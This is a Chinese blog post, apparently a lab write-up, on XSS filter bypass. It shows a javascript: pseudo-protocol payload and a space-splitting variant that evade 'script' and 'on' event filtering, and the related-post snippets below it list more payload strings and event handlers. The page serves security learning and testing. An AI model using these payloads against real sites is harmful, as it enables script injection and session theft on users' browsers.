【安全】P 4-14 绕过替换script和on事件的XSS

最新推荐文章于 2022-08-19 11:48:51 发布
最新推荐文章于 2022-08-19 11:48:51 发布
阅读量539 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Z_David_Z/article/details/113893574
版权
本文探讨了XSS漏洞的发现方法,通过构造特殊字符串来检测响应中的漏洞。接着,介绍了两种绕过策略:伪协议和空格绕过。在伪协议绕过中,使用Payload触发javascript执行。而在空格绕过中,通过调整payload结构来规避过滤。这些技巧对于理解XSS攻击和防御至关重要。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

0X01 XSS漏洞发现

构造特殊无害字符串,响应中寻找字符串。
在这里插入图片描述

0X02 绕过思考

1、寻找过滤内容
在这里插入图片描述

2、思考绕过策略:

  • 伪协议绕过

0X03 伪协议绕过

Payload:

> <a href=”javascript:alert(document.domain)>xss</a>

在这里插入图片描述

0X04 空格绕过

Payload:

"><a href="javascr  ipt:alert(document.domain);">xss</a>"><a

在这里插入图片描述

----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

87.网络安全渗透测试—[常规漏洞挖掘与利用篇3]—[xss测试-10种绕过技巧]
qwsn
01-26 4987
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀使命感!!! 文章目录 一、xss测试-10种绕过技巧 1、大小写绕过:`script标签一次匹配` 2、复写绕过(属性多余):`script大小写标签一次匹配` 3、转换标签绕过:`sciprt标签禁用` 4、转换方法绕过:alert方法禁用 5、手工闭合绕过:`既定的script标签` 6、手工闭合+单引号绕过:既定的scirpt标签+htmllentities默认参数 7、dom输出+hash属性+substring方法-弹窗: 8、ph
XSS绕过waf
m0_52813136的博客
07-28 1435
XSS绕过waf靶机
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
️ 如何绕过 BKY 对 script 的屏蔽
weixin_30421525的博客
01-21 253
Conmajia January 20, 2019 警告 这是试验,警告个屁,请不要多多尝试用它做多余的事。 果不其然,这篇文章立刻被移出主页了,我就说嘛,BKY 哪儿会那么包容坦然呢? 原文 document.title = "[我是 JS 生成的!] " + document.title .b...
xss可用事件
weixin_33772645的博客
08-25 369
onabort onafterprint onbeforeprint onbeforeunload onblur oncanplay oncanplaythrough onchange onclick oncontextmenu ondblclick ondrag ondragend ondragenter ondragleave ondragover ondrag...
网络安全(2) -- 关于一次XSS攻击-图片(img标签)的onerror事件
热门推荐
TaneRoom的博客
11-08 2万+
记一次XSS实战攻击
SQL注入之骚姿势小记 & 替换 绕过
3569
08-29 2846
https://mp.weixin.qq.com/s/ORsciwsBGQJhFdKqceprSw 1、IN之骚 这个我也偶然发现的,也不知前辈们有没有早已总结好的套路了。w3school上对in操作符的介绍: http://www.w3school.com.cn/sql/sql_in.asp 对它的描述:IN操作符允许我们在WHERE子句中规定多个值。也就说可以让我们依照一或数个不连续(...
第十一节 绕过替换scripton事件XSS-01
最新发布
09-15
绕过替换scripton事件XSS攻击技术 在Web应用安全中,XSS(Cross-Site Scripting)是一种常见的攻击方式,攻击者通过inject恶意脚本来获取用户敏感信息或进行恶意操作。绕过替换scripton事件XSS攻击是XSS...
记录几种XSS绕过方式1
08-03
XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者...了解并防御这些XSS绕过方法对于网站安全至关重要,开发者应当定期更新强化过滤规则,同时进行安全审计,确保网站对XSS攻击有足够的防护能力。
xss绕过字符过滤_XSS绕过实战练习
weixin_39640203的博客
12-21 846
前言写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战平台进行实现。level1未进行过滤,直接输入payloadpayload:alert(/xss/)level2发现对html特殊符号进行了实体编码,失效,但是发现下面input标签里还有一个输出点,可...
XSS字典大全.rar
04-17
收集的XSS字典,一共四本,分别为简单版本,普通版本,大字典,超大字典。适合FUZZXSS漏洞。与burp配合使用。工具仅限于测试,请不要用于非法操作,因字典导致法律问题与本人无关
XSSonreadystatechange事件
W小哥
06-29 534
一、测试代码 如下: <!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <title>IE9/10同时支持script元素的onloadonreadystatechange事件</title> <script src="http://code.jquery.com/jquery.min.js" onload="alert(1)" onreadystatecha
XSS绕过姿势总结
haoaaao的博客
07-18 1647
xss姿势合集
XSS漏洞
qq_43679531的博客
02-15 398
漏洞原理: 跨站脚本攻击往Web页面里插入恶意的JavaScript代码,当用户浏览该页之时,嵌入其中Web里面的JavaScript代码会被执行。 分类:反射型XSS、存储型XSS、DOM型XSS 三个弹窗函数:confirm()、prompt()、alert() 常用标签:<script>、<img>、<input> 常见的on事件onclick、onload、onkeydown、onmouseover、onmouseup 有关函数:echo、print
xss绕过
weixin_51692662的博客
08-19 2744
xss绕过
XSS的原理分析与解剖(一)
weixin_34329187的博客
09-09 299
0×01 前言: 《xss攻击手法》一开始在互联网上资料并不多(都是现成的代码,没有从基础的开始),直到刺的《白帽子讲WEB安全cn4rry的《XSS跨站脚本攻击剖析与防御》才开始好转。 我这里就不说什么xss的历史什么东西了,xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因有下: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完成自动化攻击 4、前期需...
XSS学习总结
安全学习之路
03-25 1668
XSS使用总结 XSS使用总结 传统的scripton事件类 点击类 其他传统的script类<script>alert(“xss”)</script> <script>alert(/xss/)</script>//双引号换成斜杠 <script>alert(‘xss’)</script>//用单引号 <script>alert(“xss”);</script>//用分号 <script
2-Web安全——浅谈XSS漏洞绕过XSS挑战通关
网络安全
08-19 1129
1. 绕过input标签 直接在搜索框中插入js代码,后台完全把我们输入的代码用引号括起来当做字符串处理了,在绕过过程中需要把引号闭合掉,插入js代码绕过input框,最终构造的代码如下: "><script>alert("xss test")</script>" 前面的双引号尖括号是为了把之前的">符号闭合掉,从而使插入的js代码绕过input框。 测试结果: js代码最终成功绕过input框 2. input框onclick事...
3-10xss绕过思路讲解案例演示
山兔的博客
04-28 696
XSS绕过-过滤-转换 因为在我们的实际测试过程中,有很多安全系统或多或少,会去做一些安全措施,但是,这些措施,有可能会因为程序员逻辑不够严谨,或者他使用的方法是错的,保证了他的措施起到了一部分作用,但是还是可以被绕过的 0,前端限制绕过,直接抓包重放,或者修改html前端代码 我们的安全措施不要在前端去做,比如输入字符长度限制,这样也引申出一个思想,我们所有的安全措施,永远不要放在前端去做,前端会通过js,会通过属性,起到安全的辅助措施,但是本质上是没有作用的 1.大小写,比如:<SCRIPT&g
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值